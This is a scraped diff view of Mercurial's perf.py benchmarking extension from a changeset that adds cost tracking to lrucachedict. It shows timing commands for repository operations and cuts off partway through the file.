##// END OF EJS Templates
util: allow lrucachedict to track cost of entries...
Gregory Szorc -
r39603:ee087f0d default
parent child Browse files
Show More
@@ -1,1971 +1,1977 b''
1 1 # perf.py - performance test routines
2 2 '''helper extension to measure performance'''
3 3
4 4 # "historical portability" policy of perf.py:
5 5 #
6 6 # We have to do:
7 7 # - make perf.py "loadable" with as wide Mercurial version as possible
8 8 # This doesn't mean that perf commands work correctly with that Mercurial.
9 9 # BTW, perf.py itself has been available since 1.1 (or eb240755386d).
10 10 # - make historical perf command work correctly with as wide Mercurial
11 11 # version as possible
12 12 #
13 13 # We have to do, if possible with reasonable cost:
14 14 # - make recent perf command for historical feature work correctly
15 15 # with early Mercurial
16 16 #
17 17 # We don't have to do:
18 18 # - make perf command for recent feature work correctly with early
19 19 # Mercurial
20 20
21 21 from __future__ import absolute_import
22 22 import functools
23 23 import gc
24 24 import os
25 25 import random
26 26 import struct
27 27 import sys
28 28 import threading
29 29 import time
30 30 from mercurial import (
31 31 changegroup,
32 32 cmdutil,
33 33 commands,
34 34 copies,
35 35 error,
36 36 extensions,
37 37 mdiff,
38 38 merge,
39 39 revlog,
40 40 util,
41 41 )
42 42
43 43 # for "historical portability":
44 44 # try to import modules separately (in dict order), and ignore
45 45 # failure, because these aren't available with early Mercurial
46 46 try:
47 47 from mercurial import branchmap # since 2.5 (or bcee63733aad)
48 48 except ImportError:
49 49 pass
50 50 try:
51 51 from mercurial import obsolete # since 2.3 (or ad0d6c2b3279)
52 52 except ImportError:
53 53 pass
54 54 try:
55 55 from mercurial import registrar # since 3.7 (or 37d50250b696)
56 56 dir(registrar) # forcibly load it
57 57 except ImportError:
58 58 registrar = None
59 59 try:
60 60 from mercurial import repoview # since 2.5 (or 3a6ddacb7198)
61 61 except ImportError:
62 62 pass
63 63 try:
64 64 from mercurial import scmutil # since 1.9 (or 8b252e826c68)
65 65 except ImportError:
66 66 pass
67 67 try:
68 68 from mercurial import pycompat
69 69 getargspec = pycompat.getargspec # added to module after 4.5
70 70 except (ImportError, AttributeError):
71 71 import inspect
72 72 getargspec = inspect.getargspec
73 73
74 74 try:
75 75 # 4.7+
76 76 queue = pycompat.queue.Queue
77 77 except (AttributeError, ImportError):
78 78 # <4.7.
79 79 try:
80 80 queue = pycompat.queue
81 81 except (AttributeError, ImportError):
82 82 queue = util.queue
83 83
84 84 try:
85 85 from mercurial import logcmdutil
86 86 makelogtemplater = logcmdutil.maketemplater
87 87 except (AttributeError, ImportError):
88 88 try:
89 89 makelogtemplater = cmdutil.makelogtemplater
90 90 except (AttributeError, ImportError):
91 91 makelogtemplater = None
92 92
93 93 # for "historical portability":
94 94 # define util.safehasattr forcibly, because util.safehasattr has been
95 95 # available since 1.9.3 (or 94b200a11cf7)
96 96 _undefined = object()
97 97 def safehasattr(thing, attr):
98 98 return getattr(thing, attr, _undefined) is not _undefined
99 99 setattr(util, 'safehasattr', safehasattr)
100 100
101 101 # for "historical portability":
102 102 # define util.timer forcibly, because util.timer has been available
103 103 # since ae5d60bb70c9
104 104 if safehasattr(time, 'perf_counter'):
105 105 util.timer = time.perf_counter
106 106 elif os.name == b'nt':
107 107 util.timer = time.clock
108 108 else:
109 109 util.timer = time.time
110 110
111 111 # for "historical portability":
112 112 # use locally defined empty option list, if formatteropts isn't
113 113 # available, because commands.formatteropts has been available since
114 114 # 3.2 (or 7a7eed5176a4), even though formatting itself has been
115 115 # available since 2.2 (or ae5f92e154d3)
116 116 formatteropts = getattr(cmdutil, "formatteropts",
117 117 getattr(commands, "formatteropts", []))
118 118
119 119 # for "historical portability":
120 120 # use locally defined option list, if debugrevlogopts isn't available,
121 121 # because commands.debugrevlogopts has been available since 3.7 (or
122 122 # 5606f7d0d063), even though cmdutil.openrevlog() has been available
123 123 # since 1.9 (or a79fea6b3e77).
124 124 revlogopts = getattr(cmdutil, "debugrevlogopts",
125 125 getattr(commands, "debugrevlogopts", [
126 126 (b'c', b'changelog', False, (b'open changelog')),
127 127 (b'm', b'manifest', False, (b'open manifest')),
128 128 (b'', b'dir', False, (b'open directory manifest')),
129 129 ]))
130 130
131 131 cmdtable = {}
132 132
133 133 # for "historical portability":
134 134 # define parsealiases locally, because cmdutil.parsealiases has been
135 135 # available since 1.5 (or 6252852b4332)
136 136 def parsealiases(cmd):
137 137 return cmd.lstrip(b"^").split(b"|")
138 138
139 139 if safehasattr(registrar, 'command'):
140 140 command = registrar.command(cmdtable)
141 141 elif safehasattr(cmdutil, 'command'):
142 142 command = cmdutil.command(cmdtable)
143 143 if b'norepo' not in getargspec(command).args:
144 144 # for "historical portability":
145 145 # wrap original cmdutil.command, because "norepo" option has
146 146 # been available since 3.1 (or 75a96326cecb)
147 147 _command = command
148 148 def command(name, options=(), synopsis=None, norepo=False):
149 149 if norepo:
150 150 commands.norepo += b' %s' % b' '.join(parsealiases(name))
151 151 return _command(name, list(options), synopsis)
152 152 else:
153 153 # for "historical portability":
154 154 # define "@command" annotation locally, because cmdutil.command
155 155 # has been available since 1.9 (or 2daa5179e73f)
156 156 def command(name, options=(), synopsis=None, norepo=False):
157 157 def decorator(func):
158 158 if synopsis:
159 159 cmdtable[name] = func, list(options), synopsis
160 160 else:
161 161 cmdtable[name] = func, list(options)
162 162 if norepo:
163 163 commands.norepo += b' %s' % b' '.join(parsealiases(name))
164 164 return func
165 165 return decorator
166 166
167 167 try:
168 168 import mercurial.registrar
169 169 import mercurial.configitems
170 170 configtable = {}
171 171 configitem = mercurial.registrar.configitem(configtable)
172 172 configitem(b'perf', b'presleep',
173 173 default=mercurial.configitems.dynamicdefault,
174 174 )
175 175 configitem(b'perf', b'stub',
176 176 default=mercurial.configitems.dynamicdefault,
177 177 )
178 178 configitem(b'perf', b'parentscount',
179 179 default=mercurial.configitems.dynamicdefault,
180 180 )
181 181 configitem(b'perf', b'all-timing',
182 182 default=mercurial.configitems.dynamicdefault,
183 183 )
184 184 except (ImportError, AttributeError):
185 185 pass
186 186
187 187 def getlen(ui):
188 188 if ui.configbool(b"perf", b"stub", False):
189 189 return lambda x: 1
190 190 return len
191 191
192 192 def gettimer(ui, opts=None):
193 193 """return a timer function and formatter: (timer, formatter)
194 194
195 195 This function exists to gather the creation of formatter in a single
196 196 place instead of duplicating it in all performance commands."""
197 197
198 198 # enforce an idle period before execution to counteract power management
199 199 # experimental config: perf.presleep
200 200 time.sleep(getint(ui, b"perf", b"presleep", 1))
201 201
202 202 if opts is None:
203 203 opts = {}
204 204 # redirect all to stderr unless buffer api is in use
205 205 if not ui._buffers:
206 206 ui = ui.copy()
207 207 uifout = safeattrsetter(ui, b'fout', ignoremissing=True)
208 208 if uifout:
209 209 # for "historical portability":
210 210 # ui.fout/ferr have been available since 1.9 (or 4e1ccd4c2b6d)
211 211 uifout.set(ui.ferr)
212 212
213 213 # get a formatter
214 214 uiformatter = getattr(ui, 'formatter', None)
215 215 if uiformatter:
216 216 fm = uiformatter(b'perf', opts)
217 217 else:
218 218 # for "historical portability":
219 219 # define formatter locally, because ui.formatter has been
220 220 # available since 2.2 (or ae5f92e154d3)
221 221 from mercurial import node
222 222 class defaultformatter(object):
223 223 """Minimized composition of baseformatter and plainformatter
224 224 """
225 225 def __init__(self, ui, topic, opts):
226 226 self._ui = ui
227 227 if ui.debugflag:
228 228 self.hexfunc = node.hex
229 229 else:
230 230 self.hexfunc = node.short
231 231 def __nonzero__(self):
232 232 return False
233 233 __bool__ = __nonzero__
234 234 def startitem(self):
235 235 pass
236 236 def data(self, **data):
237 237 pass
238 238 def write(self, fields, deftext, *fielddata, **opts):
239 239 self._ui.write(deftext % fielddata, **opts)
240 240 def condwrite(self, cond, fields, deftext, *fielddata, **opts):
241 241 if cond:
242 242 self._ui.write(deftext % fielddata, **opts)
243 243 def plain(self, text, **opts):
244 244 self._ui.write(text, **opts)
245 245 def end(self):
246 246 pass
247 247 fm = defaultformatter(ui, b'perf', opts)
248 248
249 249 # stub function, runs code only once instead of in a loop
250 250 # experimental config: perf.stub
251 251 if ui.configbool(b"perf", b"stub", False):
252 252 return functools.partial(stub_timer, fm), fm
253 253
254 254 # experimental config: perf.all-timing
255 255 displayall = ui.configbool(b"perf", b"all-timing", False)
256 256 return functools.partial(_timer, fm, displayall=displayall), fm
257 257
258 258 def stub_timer(fm, func, title=None):
259 259 func()
260 260
261 261 def _timer(fm, func, title=None, displayall=False):
262 262 gc.collect()
263 263 results = []
264 264 begin = util.timer()
265 265 count = 0
266 266 while True:
267 267 ostart = os.times()
268 268 cstart = util.timer()
269 269 r = func()
270 270 cstop = util.timer()
271 271 ostop = os.times()
272 272 count += 1
273 273 a, b = ostart, ostop
274 274 results.append((cstop - cstart, b[0] - a[0], b[1]-a[1]))
275 275 if cstop - begin > 3 and count >= 100:
276 276 break
277 277 if cstop - begin > 10 and count >= 3:
278 278 break
279 279
280 280 fm.startitem()
281 281
282 282 if title:
283 283 fm.write(b'title', b'! %s\n', title)
284 284 if r:
285 285 fm.write(b'result', b'! result: %s\n', r)
286 286 def display(role, entry):
287 287 prefix = b''
288 288 if role != b'best':
289 289 prefix = b'%s.' % role
290 290 fm.plain(b'!')
291 291 fm.write(prefix + b'wall', b' wall %f', entry[0])
292 292 fm.write(prefix + b'comb', b' comb %f', entry[1] + entry[2])
293 293 fm.write(prefix + b'user', b' user %f', entry[1])
294 294 fm.write(prefix + b'sys', b' sys %f', entry[2])
295 295 fm.write(prefix + b'count', b' (%s of %d)', role, count)
296 296 fm.plain(b'\n')
297 297 results.sort()
298 298 min_val = results[0]
299 299 display(b'best', min_val)
300 300 if displayall:
301 301 max_val = results[-1]
302 302 display(b'max', max_val)
303 303 avg = tuple([sum(x) / count for x in zip(*results)])
304 304 display(b'avg', avg)
305 305 median = results[len(results) // 2]
306 306 display(b'median', median)
307 307
308 308 # utilities for historical portability
309 309
310 310 def getint(ui, section, name, default):
311 311 # for "historical portability":
312 312 # ui.configint has been available since 1.9 (or fa2b596db182)
313 313 v = ui.config(section, name, None)
314 314 if v is None:
315 315 return default
316 316 try:
317 317 return int(v)
318 318 except ValueError:
319 319 raise error.ConfigError((b"%s.%s is not an integer ('%s')")
320 320 % (section, name, v))
321 321
322 322 def safeattrsetter(obj, name, ignoremissing=False):
323 323 """Ensure that 'obj' has 'name' attribute before subsequent setattr
324 324
325 325 This function is aborted, if 'obj' doesn't have 'name' attribute
326 326 at runtime. This avoids overlooking removal of an attribute, which
327 327 breaks assumption of performance measurement, in the future.
328 328
329 329 This function returns the object to (1) assign a new value, and
330 330 (2) restore an original value to the attribute.
331 331
332 332 If 'ignoremissing' is true, missing 'name' attribute doesn't cause
333 333 abortion, and this function returns None. This is useful to
334 334 examine an attribute, which isn't ensured in all Mercurial
335 335 versions.
336 336 """
337 337 if not util.safehasattr(obj, name):
338 338 if ignoremissing:
339 339 return None
340 340 raise error.Abort((b"missing attribute %s of %s might break assumption"
341 341 b" of performance measurement") % (name, obj))
342 342
343 343 origvalue = getattr(obj, name)
344 344 class attrutil(object):
345 345 def set(self, newvalue):
346 346 setattr(obj, name, newvalue)
347 347 def restore(self):
348 348 setattr(obj, name, origvalue)
349 349
350 350 return attrutil()
351 351
352 352 # utilities to examine each internal API changes
353 353
354 354 def getbranchmapsubsettable():
355 355 # for "historical portability":
356 356 # subsettable is defined in:
357 357 # - branchmap since 2.9 (or 175c6fd8cacc)
358 358 # - repoview since 2.5 (or 59a9f18d4587)
359 359 for mod in (branchmap, repoview):
360 360 subsettable = getattr(mod, 'subsettable', None)
361 361 if subsettable:
362 362 return subsettable
363 363
364 364 # bisecting in bcee63733aad::59a9f18d4587 can reach here (both
365 365 # branchmap and repoview modules exist, but subsettable attribute
366 366 # doesn't)
367 367 raise error.Abort((b"perfbranchmap not available with this Mercurial"),
368 368 hint=b"use 2.5 or later")
369 369
370 370 def getsvfs(repo):
371 371 """Return appropriate object to access files under .hg/store
372 372 """
373 373 # for "historical portability":
374 374 # repo.svfs has been available since 2.3 (or 7034365089bf)
375 375 svfs = getattr(repo, 'svfs', None)
376 376 if svfs:
377 377 return svfs
378 378 else:
379 379 return getattr(repo, 'sopener')
380 380
381 381 def getvfs(repo):
382 382 """Return appropriate object to access files under .hg
383 383 """
384 384 # for "historical portability":
385 385 # repo.vfs has been available since 2.3 (or 7034365089bf)
386 386 vfs = getattr(repo, 'vfs', None)
387 387 if vfs:
388 388 return vfs
389 389 else:
390 390 return getattr(repo, 'opener')
391 391
392 392 def repocleartagscachefunc(repo):
393 393 """Return the function to clear tags cache according to repo internal API
394 394 """
395 395 if util.safehasattr(repo, b'_tagscache'): # since 2.0 (or 9dca7653b525)
396 396 # in this case, setattr(repo, '_tagscache', None) or so isn't
397 397 # correct way to clear tags cache, because existing code paths
398 398 # expect _tagscache to be a structured object.
399 399 def clearcache():
400 400 # _tagscache has been filteredpropertycache since 2.5 (or
401 401 # 98c867ac1330), and delattr() can't work in such case
402 402 if b'_tagscache' in vars(repo):
403 403 del repo.__dict__[b'_tagscache']
404 404 return clearcache
405 405
406 406 repotags = safeattrsetter(repo, b'_tags', ignoremissing=True)
407 407 if repotags: # since 1.4 (or 5614a628d173)
408 408 return lambda : repotags.set(None)
409 409
410 410 repotagscache = safeattrsetter(repo, b'tagscache', ignoremissing=True)
411 411 if repotagscache: # since 0.6 (or d7df759d0e97)
412 412 return lambda : repotagscache.set(None)
413 413
414 414 # Mercurial earlier than 0.6 (or d7df759d0e97) logically reaches
415 415 # this point, but it isn't so problematic, because:
416 416 # - repo.tags of such Mercurial isn't "callable", and repo.tags()
417 417 # in perftags() causes failure soon
418 418 # - perf.py itself has been available since 1.1 (or eb240755386d)
419 419 raise error.Abort((b"tags API of this hg command is unknown"))
420 420
421 421 # utilities to clear cache
422 422
423 423 def clearfilecache(repo, attrname):
424 424 unfi = repo.unfiltered()
425 425 if attrname in vars(unfi):
426 426 delattr(unfi, attrname)
427 427 unfi._filecache.pop(attrname, None)
428 428
429 429 # perf commands
430 430
431 431 @command(b'perfwalk', formatteropts)
432 432 def perfwalk(ui, repo, *pats, **opts):
433 433 timer, fm = gettimer(ui, opts)
434 434 m = scmutil.match(repo[None], pats, {})
435 435 timer(lambda: len(list(repo.dirstate.walk(m, subrepos=[], unknown=True,
436 436 ignored=False))))
437 437 fm.end()
438 438
439 439 @command(b'perfannotate', formatteropts)
440 440 def perfannotate(ui, repo, f, **opts):
441 441 timer, fm = gettimer(ui, opts)
442 442 fc = repo[b'.'][f]
443 443 timer(lambda: len(fc.annotate(True)))
444 444 fm.end()
445 445
446 446 @command(b'perfstatus',
447 447 [(b'u', b'unknown', False,
448 448 b'ask status to look for unknown files')] + formatteropts)
449 449 def perfstatus(ui, repo, **opts):
450 450 #m = match.always(repo.root, repo.getcwd())
451 451 #timer(lambda: sum(map(len, repo.dirstate.status(m, [], False, False,
452 452 # False))))
453 453 timer, fm = gettimer(ui, opts)
454 454 timer(lambda: sum(map(len, repo.status(unknown=opts[b'unknown']))))
455 455 fm.end()
456 456
457 457 @command(b'perfaddremove', formatteropts)
458 458 def perfaddremove(ui, repo, **opts):
459 459 timer, fm = gettimer(ui, opts)
460 460 try:
461 461 oldquiet = repo.ui.quiet
462 462 repo.ui.quiet = True
463 463 matcher = scmutil.match(repo[None])
464 464 opts[b'dry_run'] = True
465 465 timer(lambda: scmutil.addremove(repo, matcher, b"", opts))
466 466 finally:
467 467 repo.ui.quiet = oldquiet
468 468 fm.end()
469 469
470 470 def clearcaches(cl):
471 471 # behave somewhat consistently across internal API changes
472 472 if util.safehasattr(cl, b'clearcaches'):
473 473 cl.clearcaches()
474 474 elif util.safehasattr(cl, b'_nodecache'):
475 475 from mercurial.node import nullid, nullrev
476 476 cl._nodecache = {nullid: nullrev}
477 477 cl._nodepos = None
478 478
479 479 @command(b'perfheads', formatteropts)
480 480 def perfheads(ui, repo, **opts):
481 481 timer, fm = gettimer(ui, opts)
482 482 cl = repo.changelog
483 483 def d():
484 484 len(cl.headrevs())
485 485 clearcaches(cl)
486 486 timer(d)
487 487 fm.end()
488 488
489 489 @command(b'perftags', formatteropts)
490 490 def perftags(ui, repo, **opts):
491 491 import mercurial.changelog
492 492 import mercurial.manifest
493 493 timer, fm = gettimer(ui, opts)
494 494 svfs = getsvfs(repo)
495 495 repocleartagscache = repocleartagscachefunc(repo)
496 496 def t():
497 497 repo.changelog = mercurial.changelog.changelog(svfs)
498 498 repo.manifestlog = mercurial.manifest.manifestlog(svfs, repo)
499 499 repocleartagscache()
500 500 return len(repo.tags())
501 501 timer(t)
502 502 fm.end()
503 503
504 504 @command(b'perfancestors', formatteropts)
505 505 def perfancestors(ui, repo, **opts):
506 506 timer, fm = gettimer(ui, opts)
507 507 heads = repo.changelog.headrevs()
508 508 def d():
509 509 for a in repo.changelog.ancestors(heads):
510 510 pass
511 511 timer(d)
512 512 fm.end()
513 513
514 514 @command(b'perfancestorset', formatteropts)
515 515 def perfancestorset(ui, repo, revset, **opts):
516 516 timer, fm = gettimer(ui, opts)
517 517 revs = repo.revs(revset)
518 518 heads = repo.changelog.headrevs()
519 519 def d():
520 520 s = repo.changelog.ancestors(heads)
521 521 for rev in revs:
522 522 rev in s
523 523 timer(d)
524 524 fm.end()
525 525
526 526 @command(b'perfbookmarks', formatteropts)
527 527 def perfbookmarks(ui, repo, **opts):
528 528 """benchmark parsing bookmarks from disk to memory"""
529 529 timer, fm = gettimer(ui, opts)
530 530 def d():
531 531 clearfilecache(repo, b'_bookmarks')
532 532 repo._bookmarks
533 533 timer(d)
534 534 fm.end()
535 535
536 536 @command(b'perfbundleread', formatteropts, b'BUNDLE')
537 537 def perfbundleread(ui, repo, bundlepath, **opts):
538 538 """Benchmark reading of bundle files.
539 539
540 540 This command is meant to isolate the I/O part of bundle reading as
541 541 much as possible.
542 542 """
543 543 from mercurial import (
544 544 bundle2,
545 545 exchange,
546 546 streamclone,
547 547 )
548 548
549 549 def makebench(fn):
550 550 def run():
551 551 with open(bundlepath, b'rb') as fh:
552 552 bundle = exchange.readbundle(ui, fh, bundlepath)
553 553 fn(bundle)
554 554
555 555 return run
556 556
557 557 def makereadnbytes(size):
558 558 def run():
559 559 with open(bundlepath, b'rb') as fh:
560 560 bundle = exchange.readbundle(ui, fh, bundlepath)
561 561 while bundle.read(size):
562 562 pass
563 563
564 564 return run
565 565
566 566 def makestdioread(size):
567 567 def run():
568 568 with open(bundlepath, b'rb') as fh:
569 569 while fh.read(size):
570 570 pass
571 571
572 572 return run
573 573
574 574 # bundle1
575 575
576 576 def deltaiter(bundle):
577 577 for delta in bundle.deltaiter():
578 578 pass
579 579
580 580 def iterchunks(bundle):
581 581 for chunk in bundle.getchunks():
582 582 pass
583 583
584 584 # bundle2
585 585
586 586 def forwardchunks(bundle):
587 587 for chunk in bundle._forwardchunks():
588 588 pass
589 589
590 590 def iterparts(bundle):
591 591 for part in bundle.iterparts():
592 592 pass
593 593
594 594 def iterpartsseekable(bundle):
595 595 for part in bundle.iterparts(seekable=True):
596 596 pass
597 597
598 598 def seek(bundle):
599 599 for part in bundle.iterparts(seekable=True):
600 600 part.seek(0, os.SEEK_END)
601 601
602 602 def makepartreadnbytes(size):
603 603 def run():
604 604 with open(bundlepath, b'rb') as fh:
605 605 bundle = exchange.readbundle(ui, fh, bundlepath)
606 606 for part in bundle.iterparts():
607 607 while part.read(size):
608 608 pass
609 609
610 610 return run
611 611
612 612 benches = [
613 613 (makestdioread(8192), b'read(8k)'),
614 614 (makestdioread(16384), b'read(16k)'),
615 615 (makestdioread(32768), b'read(32k)'),
616 616 (makestdioread(131072), b'read(128k)'),
617 617 ]
618 618
619 619 with open(bundlepath, b'rb') as fh:
620 620 bundle = exchange.readbundle(ui, fh, bundlepath)
621 621
622 622 if isinstance(bundle, changegroup.cg1unpacker):
623 623 benches.extend([
624 624 (makebench(deltaiter), b'cg1 deltaiter()'),
625 625 (makebench(iterchunks), b'cg1 getchunks()'),
626 626 (makereadnbytes(8192), b'cg1 read(8k)'),
627 627 (makereadnbytes(16384), b'cg1 read(16k)'),
628 628 (makereadnbytes(32768), b'cg1 read(32k)'),
629 629 (makereadnbytes(131072), b'cg1 read(128k)'),
630 630 ])
631 631 elif isinstance(bundle, bundle2.unbundle20):
632 632 benches.extend([
633 633 (makebench(forwardchunks), b'bundle2 forwardchunks()'),
634 634 (makebench(iterparts), b'bundle2 iterparts()'),
635 635 (makebench(iterpartsseekable), b'bundle2 iterparts() seekable'),
636 636 (makebench(seek), b'bundle2 part seek()'),
637 637 (makepartreadnbytes(8192), b'bundle2 part read(8k)'),
638 638 (makepartreadnbytes(16384), b'bundle2 part read(16k)'),
639 639 (makepartreadnbytes(32768), b'bundle2 part read(32k)'),
640 640 (makepartreadnbytes(131072), b'bundle2 part read(128k)'),
641 641 ])
642 642 elif isinstance(bundle, streamclone.streamcloneapplier):
643 643 raise error.Abort(b'stream clone bundles not supported')
644 644 else:
645 645 raise error.Abort(b'unhandled bundle type: %s' % type(bundle))
646 646
647 647 for fn, title in benches:
648 648 timer, fm = gettimer(ui, opts)
649 649 timer(fn, title=title)
650 650 fm.end()
651 651
652 652 @command(b'perfchangegroupchangelog', formatteropts +
653 653 [(b'', b'version', b'02', b'changegroup version'),
654 654 (b'r', b'rev', b'', b'revisions to add to changegroup')])
655 655 def perfchangegroupchangelog(ui, repo, version=b'02', rev=None, **opts):
656 656 """Benchmark producing a changelog group for a changegroup.
657 657
658 658 This measures the time spent processing the changelog during a
659 659 bundle operation. This occurs during `hg bundle` and on a server
660 660 processing a `getbundle` wire protocol request (handles clones
661 661 and pull requests).
662 662
663 663 By default, all revisions are added to the changegroup.
664 664 """
665 665 cl = repo.changelog
666 666 nodes = [cl.lookup(r) for r in repo.revs(rev or b'all()')]
667 667 bundler = changegroup.getbundler(version, repo)
668 668
669 669 def d():
670 670 state, chunks = bundler._generatechangelog(cl, nodes)
671 671 for chunk in chunks:
672 672 pass
673 673
674 674 timer, fm = gettimer(ui, opts)
675 675
676 676 # Terminal printing can interfere with timing. So disable it.
677 677 with ui.configoverride({(b'progress', b'disable'): True}):
678 678 timer(d)
679 679
680 680 fm.end()
681 681
682 682 @command(b'perfdirs', formatteropts)
683 683 def perfdirs(ui, repo, **opts):
684 684 timer, fm = gettimer(ui, opts)
685 685 dirstate = repo.dirstate
686 686 b'a' in dirstate
687 687 def d():
688 688 dirstate.hasdir(b'a')
689 689 del dirstate._map._dirs
690 690 timer(d)
691 691 fm.end()
692 692
693 693 @command(b'perfdirstate', formatteropts)
694 694 def perfdirstate(ui, repo, **opts):
695 695 timer, fm = gettimer(ui, opts)
696 696 b"a" in repo.dirstate
697 697 def d():
698 698 repo.dirstate.invalidate()
699 699 b"a" in repo.dirstate
700 700 timer(d)
701 701 fm.end()
702 702
703 703 @command(b'perfdirstatedirs', formatteropts)
704 704 def perfdirstatedirs(ui, repo, **opts):
705 705 timer, fm = gettimer(ui, opts)
706 706 b"a" in repo.dirstate
707 707 def d():
708 708 repo.dirstate.hasdir(b"a")
709 709 del repo.dirstate._map._dirs
710 710 timer(d)
711 711 fm.end()
712 712
713 713 @command(b'perfdirstatefoldmap', formatteropts)
714 714 def perfdirstatefoldmap(ui, repo, **opts):
715 715 timer, fm = gettimer(ui, opts)
716 716 dirstate = repo.dirstate
717 717 b'a' in dirstate
718 718 def d():
719 719 dirstate._map.filefoldmap.get(b'a')
720 720 del dirstate._map.filefoldmap
721 721 timer(d)
722 722 fm.end()
723 723
724 724 @command(b'perfdirfoldmap', formatteropts)
725 725 def perfdirfoldmap(ui, repo, **opts):
726 726 timer, fm = gettimer(ui, opts)
727 727 dirstate = repo.dirstate
728 728 b'a' in dirstate
729 729 def d():
730 730 dirstate._map.dirfoldmap.get(b'a')
731 731 del dirstate._map.dirfoldmap
732 732 del dirstate._map._dirs
733 733 timer(d)
734 734 fm.end()
735 735
736 736 @command(b'perfdirstatewrite', formatteropts)
737 737 def perfdirstatewrite(ui, repo, **opts):
738 738 timer, fm = gettimer(ui, opts)
739 739 ds = repo.dirstate
740 740 b"a" in ds
741 741 def d():
742 742 ds._dirty = True
743 743 ds.write(repo.currenttransaction())
744 744 timer(d)
745 745 fm.end()
746 746
747 747 @command(b'perfmergecalculate',
748 748 [(b'r', b'rev', b'.', b'rev to merge against')] + formatteropts)
749 749 def perfmergecalculate(ui, repo, rev, **opts):
750 750 timer, fm = gettimer(ui, opts)
751 751 wctx = repo[None]
752 752 rctx = scmutil.revsingle(repo, rev, rev)
753 753 ancestor = wctx.ancestor(rctx)
754 754 # we don't want working dir files to be stat'd in the benchmark, so prime
755 755 # that cache
756 756 wctx.dirty()
757 757 def d():
758 758 # acceptremote is True because we don't want prompts in the middle of
759 759 # our benchmark
760 760 merge.calculateupdates(repo, wctx, rctx, [ancestor], False, False,
761 761 acceptremote=True, followcopies=True)
762 762 timer(d)
763 763 fm.end()
764 764
765 765 @command(b'perfpathcopies', [], b"REV REV")
766 766 def perfpathcopies(ui, repo, rev1, rev2, **opts):
767 767 timer, fm = gettimer(ui, opts)
768 768 ctx1 = scmutil.revsingle(repo, rev1, rev1)
769 769 ctx2 = scmutil.revsingle(repo, rev2, rev2)
770 770 def d():
771 771 copies.pathcopies(ctx1, ctx2)
772 772 timer(d)
773 773 fm.end()
774 774
775 775 @command(b'perfphases',
776 776 [(b'', b'full', False, b'include file reading time too'),
777 777 ], b"")
778 778 def perfphases(ui, repo, **opts):
779 779 """benchmark phasesets computation"""
780 780 timer, fm = gettimer(ui, opts)
781 781 _phases = repo._phasecache
782 782 full = opts.get(b'full')
783 783 def d():
784 784 phases = _phases
785 785 if full:
786 786 clearfilecache(repo, b'_phasecache')
787 787 phases = repo._phasecache
788 788 phases.invalidate()
789 789 phases.loadphaserevs(repo)
790 790 timer(d)
791 791 fm.end()
792 792
793 793 @command(b'perfphasesremote',
794 794 [], b"[DEST]")
795 795 def perfphasesremote(ui, repo, dest=None, **opts):
796 796 """benchmark time needed to analyse phases of the remote server"""
797 797 from mercurial.node import (
798 798 bin,
799 799 )
800 800 from mercurial import (
801 801 exchange,
802 802 hg,
803 803 phases,
804 804 )
805 805 timer, fm = gettimer(ui, opts)
806 806
807 807 path = ui.paths.getpath(dest, default=(b'default-push', b'default'))
808 808 if not path:
809 809 raise error.Abort((b'default repository not configured!'),
810 810 hint=(b"see 'hg help config.paths'"))
811 811 dest = path.pushloc or path.loc
812 812 branches = (path.branch, opts.get(b'branch') or [])
813 813 ui.status((b'analysing phase of %s\n') % util.hidepassword(dest))
814 814 revs, checkout = hg.addbranchrevs(repo, repo, branches, opts.get(b'rev'))
815 815 other = hg.peer(repo, opts, dest)
816 816
817 817 # easier to perform discovery through the operation
818 818 op = exchange.pushoperation(repo, other)
819 819 exchange._pushdiscoverychangeset(op)
820 820
821 821 remotesubset = op.fallbackheads
822 822
823 823 with other.commandexecutor() as e:
824 824 remotephases = e.callcommand(b'listkeys',
825 825 {b'namespace': b'phases'}).result()
826 826 del other
827 827 publishing = remotephases.get(b'publishing', False)
828 828 if publishing:
829 829 ui.status((b'publishing: yes\n'))
830 830 else:
831 831 ui.status((b'publishing: no\n'))
832 832
833 833 nodemap = repo.changelog.nodemap
834 834 nonpublishroots = 0
835 835 for nhex, phase in remotephases.iteritems():
836 836 if nhex == b'publishing': # ignore data related to publish option
837 837 continue
838 838 node = bin(nhex)
839 839 if node in nodemap and int(phase):
840 840 nonpublishroots += 1
841 841 ui.status((b'number of roots: %d\n') % len(remotephases))
842 842 ui.status((b'number of known non public roots: %d\n') % nonpublishroots)
843 843 def d():
844 844 phases.remotephasessummary(repo,
845 845 remotesubset,
846 846 remotephases)
847 847 timer(d)
848 848 fm.end()
849 849
850 850 @command(b'perfmanifest',[
851 851 (b'm', b'manifest-rev', False, b'Look up a manifest node revision'),
852 852 (b'', b'clear-disk', False, b'clear on-disk caches too'),
853 853 ], b'REV|NODE')
854 854 def perfmanifest(ui, repo, rev, manifest_rev=False, clear_disk=False, **opts):
855 855 """benchmark the time to read a manifest from disk and return a usable
856 856 dict-like object
857 857
858 858 Manifest caches are cleared before retrieval."""
859 859 timer, fm = gettimer(ui, opts)
860 860 if not manifest_rev:
861 861 ctx = scmutil.revsingle(repo, rev, rev)
862 862 t = ctx.manifestnode()
863 863 else:
864 864 from mercurial.node import bin
865 865
866 866 if len(rev) == 40:
867 867 t = bin(rev)
868 868 else:
869 869 try:
870 870 rev = int(rev)
871 871
872 872 if util.safehasattr(repo.manifestlog, b'getstorage'):
873 873 t = repo.manifestlog.getstorage(b'').node(rev)
874 874 else:
875 875 t = repo.manifestlog._revlog.lookup(rev)
876 876 except ValueError:
877 877 raise error.Abort(b'manifest revision must be integer or full '
878 878 b'node')
879 879 def d():
880 880 repo.manifestlog.clearcaches(clear_persisted_data=clear_disk)
881 881 repo.manifestlog[t].read()
882 882 timer(d)
883 883 fm.end()
884 884
885 885 @command(b'perfchangeset', formatteropts)
886 886 def perfchangeset(ui, repo, rev, **opts):
887 887 timer, fm = gettimer(ui, opts)
888 888 n = scmutil.revsingle(repo, rev).node()
889 889 def d():
890 890 repo.changelog.read(n)
891 891 #repo.changelog._cache = None
892 892 timer(d)
893 893 fm.end()
894 894
895 895 @command(b'perfindex', formatteropts)
896 896 def perfindex(ui, repo, **opts):
897 897 import mercurial.revlog
898 898 timer, fm = gettimer(ui, opts)
899 899 mercurial.revlog._prereadsize = 2**24 # disable lazy parser in old hg
900 900 n = repo[b"tip"].node()
901 901 svfs = getsvfs(repo)
902 902 def d():
903 903 cl = mercurial.revlog.revlog(svfs, b"00changelog.i")
904 904 cl.rev(n)
905 905 timer(d)
906 906 fm.end()
907 907
908 908 @command(b'perfstartup', formatteropts)
909 909 def perfstartup(ui, repo, **opts):
910 910 timer, fm = gettimer(ui, opts)
